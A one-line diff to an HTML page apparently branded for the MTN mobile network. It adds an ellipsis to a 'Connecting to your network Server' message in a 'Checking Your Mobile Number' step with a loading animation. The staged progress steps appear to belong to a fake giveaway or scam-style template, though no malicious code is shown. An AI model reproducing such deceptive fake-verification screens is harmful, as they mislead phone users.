--- a/mtndamba.html
+++ b/mtndamba.html
@@ -169,7 +169,7 @@
                 <div id="third-box" style="margin-bottom: 2.5rem;" class="quedate__step js-hidden">
                     <span style="font-weight: bold; font-size: 2rem; text-align:center" class="quedate__text">Checking Your Mobile Number</span>
                     <div class="quedate__first js-hidden">
-                        <div style="border: 1px solid gray;  width:80%" class="quedate__load"><font color="white">Connecting to your network Server</font><span class="quedate__load-a js-hidden"></span>
+                        <div style="border: 1px solid gray;  width:80%" class="quedate__load"><font color="white">Connecting to your network Server...</font><span class="quedate__load-a js-hidden"></span>
                         </div>
                         <div style="border: 1px solid gray;border-left: none; width:30%" class="quedate__load-icon">
                             <svg id="first-loading" class="quedate__load-animate" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style=" shape-rendering: auto;" viewBox="0 0 100 100" preserveAspectRatio="xMidYMid" width="3.2rem">
